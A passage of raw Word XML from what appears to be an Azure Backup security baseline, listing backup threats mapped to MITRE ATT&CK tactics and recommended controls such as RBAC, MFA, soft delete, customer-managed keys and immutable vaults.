          <w:numId w:val="322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Unauthorized configuration changes, accidental deletion, or improper backup management corrupt backup data rendering recovery impossible during emergencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9A3626" w14:textId="70FABBBC" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Unauthorized backup access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B944EBA" w14:textId="22FA9CAF" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Inadequate access controls allow unauthorized users to restore, modify, or delete backup data creating security and compliance violations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C3A62F" w14:textId="6AB4B111" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Regional disaster vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C125009" w14:textId="5DD92D9D" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t xml:space="preserve">Backup data stored only in primary </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C855F7">
        <w:t>region</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C855F7">
        <w:t xml:space="preserve"> becomes unavailable during regional disasters preventing recovery when most needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C764593" w14:textId="53943724" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5A8E65" w14:textId="2721ECB1" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0230D14C" w14:textId="0F9DEB49" w:rsidR="00EA6627" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>inhibit system recovery (T1490) deleting backup copies preventing restoration after ransomware attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B0768" w14:textId="1F52B33B" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50927704" w14:textId="480D973A" w:rsidR="00EA6627" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>indicator removal (T1070) and impair defenses (T1562) disabling backup monitoring and deleting backup logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D2675" w14:textId="6BB4BF08" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26848E0A" w14:textId="3F496FFF" w:rsidR="00EA6627" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>steal application access token (T1528) compromising backup service accounts to access and corrupt backup data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFFBD78" w14:textId="31BEF854" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24493569" w14:textId="2093FB98" w:rsidR="00EA6627" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t xml:space="preserve">data from cloud storage (T1530) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA6627">
        <w:t>exfiltrating</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA6627">
        <w:t xml:space="preserve"> sensitive data through backup systems bypassing production access controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5404AEE0" w14:textId="6004D15D" w:rsidR="00AA1FA6" w:rsidRDefault="00E96770" w:rsidP="00E96770">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96770">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>BR-2.1: Secure backup access and operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD63DC5" w14:textId="39016B41" w:rsidR="00E96770" w:rsidRDefault="00E96770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96770">
        <w:t>Access control configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD99457" w14:textId="32E56ECC" w:rsidR="00E96770" w:rsidRDefault="00E96770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96770">
        <w:t>Implement Azure RBAC for backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D3596" w14:textId="08DC2AAB" w:rsidR="00E96770" w:rsidRDefault="00E96770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96770">
        <w:lastRenderedPageBreak/>
        <w:t>Assign Azure role-based access control roles including Backup Contributor, Backup Reader, and Backup Operator segregating duties and enforcing least privilege access to backup operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6BFE4F" w14:textId="19B62F2C" w:rsidR="00E96770" w:rsidRDefault="00E96770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96770">
        <w:t>Require multi-factor authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C39B38" w14:textId="5CAE6A17" w:rsidR="00E96770" w:rsidRDefault="00E96770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96770">
        <w:t>Enforce multi-factor authentication for critical backup operations including restore, retention changes, backup deletion, and Recovery Services vault configuration preventing unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B137EFA" w14:textId="6E2B630B" w:rsidR="00E96770" w:rsidRDefault="00E96770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96770">
        <w:t>Enable Azure Private Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D27ADD4" w14:textId="59F8EA2B" w:rsidR="00E96770" w:rsidRDefault="00E96770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96770">
        <w:t>Configure private endpoints for Recovery Services vaults restricting backup traffic to private networks preventing backup data exfiltration over public internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9980D6" w14:textId="05D1E6FE" w:rsidR="00E96770" w:rsidRDefault="00E96770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96770">
        <w:t>Implement just-in-time access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE65E7" w14:textId="7C35DA20" w:rsidR="00E96770" w:rsidRDefault="00E96770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96770">
        <w:t>Use Microsoft Entra Privileged Identity Management for time-bound backup administrator access requiring approval workflows and business justification for elevated permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CAA497" w14:textId="27F35F61" w:rsidR="00A3148C" w:rsidRDefault="00A3148C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3148C">
        <w:t>Backup operation protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3218D61A" w14:textId="1F87BFCF" w:rsidR="009B29D5" w:rsidRDefault="009B29D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B29D5">
        <w:t>Enable MFA for backup deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700FEB1" w14:textId="11583DE1" w:rsidR="009B29D5" w:rsidRDefault="009B29D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="325"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B29D5">
        <w:t xml:space="preserve">Configure security PIN requirements for backup deletion operations requiring PIN generated in Azure portal preventing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B29D5">
        <w:t>automated malicious</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B29D5">
        <w:t xml:space="preserve"> deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A964BA" w14:textId="2585F1B4" w:rsidR="009B29D5" w:rsidRDefault="009B29D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B29D5">
        <w:t>Implement soft delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C2CB70" w14:textId="341481ED" w:rsidR="009B29D5" w:rsidRDefault="009B29D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="325"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B29D5">
        <w:t>Enable soft delete for Recovery Services vaults retaining deleted backup data for 14 days allowing recovery from accidental or malicious deletion before permanent removal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0984D1" w14:textId="128FE2CD" w:rsidR="009B29D5" w:rsidRDefault="009B29D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B29D5">
        <w:t>Configure audit logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59352FB8" w14:textId="23F877E5" w:rsidR="009B29D5" w:rsidRDefault="009B29D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="325"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B29D5">
        <w:t>Enable Azure Monitor logging for all backup operations tracking backup creation, deletion, restore, and configuration changes for security monitoring and compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C34B8" w14:textId="77777777" w:rsidR="009B29D5" w:rsidRDefault="009B29D5" w:rsidP="009B29D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E56C44D" w14:textId="14FEDC77" w:rsidR="009B29D5" w:rsidRDefault="009B29D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B29D5">
        <w:t>Establish alert rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448EC597" w14:textId="7089081E" w:rsidR="009B29D5" w:rsidRDefault="009B29D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="325"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B29D5">
        <w:lastRenderedPageBreak/>
        <w:t>Create Azure Monitor alerts for critical backup events including backup failures, unauthorized restore operations, retention policy changes, and soft delete disablement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B328A3" w14:textId="5D8B7151" w:rsidR="00287164" w:rsidRDefault="00287164" w:rsidP="00287164">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>BR-2.2: Encrypt backup data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE0E187" w14:textId="7A7DD130" w:rsidR="00287164" w:rsidRDefault="00287164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="326"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:t>Protect backup data confidentiality through encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7306F2" w14:textId="19F21491" w:rsidR="00287164" w:rsidRDefault="00287164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:t>Implement encryption for backup data at rest and in transit protecting confidentiality and meeting regulatory requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1722EF51" w14:textId="3C691B25" w:rsidR="00287164" w:rsidRDefault="00287164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="326"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:t>Encryption configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5692F2D7" w14:textId="7D123161" w:rsidR="00287164" w:rsidRDefault="00287164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:t>Enable platform-managed encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3D868F" w14:textId="3ECA5C2F" w:rsidR="00287164" w:rsidRDefault="00287164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:t>Azure Backup automatically encrypts backup data using AES-256 encryption with platform-managed keys requiring no additional configuration for baseline protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395B31D9" w14:textId="65441D1C" w:rsidR="00287164" w:rsidRDefault="00287164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:t>Implement customer-managed keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6990C73D" w14:textId="4ECF8355" w:rsidR="00287164" w:rsidRDefault="00287164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:t>Configure customer-managed keys in Azure Key Vault for backup encryption providing organizational control over encryption keys and meeting specific compliance requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD2EF3D" w14:textId="7B28AF00" w:rsidR="00287164" w:rsidRDefault="00287164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:t>Protect encryption keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C4882A" w14:textId="3CD579CC" w:rsidR="00287164" w:rsidRDefault="00287164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:t>Enable soft delete and purge protection for Azure Key Vault storing backup encryption keys preventing key deletion and ensuring backup recoverability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED8D253" w14:textId="11ACC074" w:rsidR="00287164" w:rsidRDefault="00287164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:t>Encrypt on-premises backups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B8A16" w14:textId="6EA2DD8E" w:rsidR="00287164" w:rsidRDefault="00287164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00287164">
        <w:t>Configure passphrase-based encryption for on-premises backups using Azure Backup agent protecting data during transit and storage in Azure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA5ACC2" w14:textId="7263B612" w:rsidR="00155A14" w:rsidRDefault="00155A14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="326"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00155A14">
        <w:t>Key management best practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790E1C14" w14:textId="12513119" w:rsidR="00155A14" w:rsidRDefault="00155A14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00155A14">
        <w:t>Include keys in backup scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42224C10" w14:textId="4EB877C8" w:rsidR="00155A14" w:rsidRDefault="00155A14" w:rsidP="00155A14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="00155A14">
        <w:t>Ensure customer-managed keys used for backup encryption are themselves protected through Azure Key Vault backup preventing key loss scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D764835" w14:textId="77777777" w:rsidR="00155A14" w:rsidRDefault="00155A14" w:rsidP="00155A14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300F67B5" w14:textId="4BC9E674" w:rsidR="00155A14" w:rsidRDefault="00155A14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00155A14">
        <w:t>Implement key rotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B775D0A" w14:textId="05EA1E3F" w:rsidR="00155A14" w:rsidRDefault="00155A14" w:rsidP="00155A14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="00155A14">
        <w:lastRenderedPageBreak/>
        <w:t>Establish key rotation policies for customer-managed encryption keys balancing security requirements with operational complexity and backup compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C0A2A1" w14:textId="0543DEBF" w:rsidR="00155A14" w:rsidRDefault="00155A14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00155A14">
        <w:t>Monitor key access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEAE3B0" w14:textId="769CF787" w:rsidR="00155A14" w:rsidRDefault="00155A14" w:rsidP="00155A14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="00155A14">
        <w:t>Enable Azure Key Vault logging tracking encryption key access, usage, and administrative operations detecting unauthorized key access attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9536E1" w14:textId="722602C9" w:rsidR="00155A14" w:rsidRDefault="00155A14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00155A14">
        <w:t>Document key recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4CACAC" w14:textId="45A0F94A" w:rsidR="00155A14" w:rsidRDefault="00155A14" w:rsidP="00155A14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="00155A14">
        <w:t>Maintain documented procedures for encryption key recovery and backup decryption ensuring business continuity during key management incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D3E94" w14:textId="5E343828" w:rsidR="00D05157" w:rsidRDefault="00D05157" w:rsidP="00D05157">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>BR-2.3: Implement backup immutability and redundancy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA58CC9" w14:textId="36FFFE7C" w:rsidR="00D05157" w:rsidRDefault="00D05157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:t>Ensure backup data integrity and availability through immutability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4AE2F" w14:textId="2E7C717A" w:rsidR="00D05157" w:rsidRDefault="00D05157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:t>Configure immutable backup storage and geographic redundancy protecting against ransomware, corruption, and regional disasters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423CAD51" w14:textId="11257F51" w:rsidR="00D05157" w:rsidRDefault="00D05157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:t>Immutability configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2EACD" w14:textId="1F19521B" w:rsidR="00D05157" w:rsidRDefault="00D05157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:t>Enable immutable vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AACDC41" w14:textId="43A252D1" w:rsidR="00D05157" w:rsidRDefault="00D05157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:t>Configure immutable vaults for Recovery Services vaults preventing backup deletion, retention reduction, and soft delete disablement for specified lock periods protecting against ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28660870" w14:textId="23452AB2" w:rsidR="00D05157" w:rsidRDefault="00D05157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:t>Configure vault lock periods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E0EAE" w14:textId="39BA76B9" w:rsidR="00D05157" w:rsidRDefault="00D05157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:t>Define minimum retention lock periods based on regulatory requirements typically 180 days or longer ensuring backup data cannot be prematurely deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A3D9B5" w14:textId="27BEC2F6" w:rsidR="00D05157" w:rsidRDefault="00D05157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:t>Implement multi-user authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323C8E3" w14:textId="1ECF1848" w:rsidR="00D05157" w:rsidRDefault="00D05157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:t xml:space="preserve">Require multi-user authorization for immutability configuration changes preventing single </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
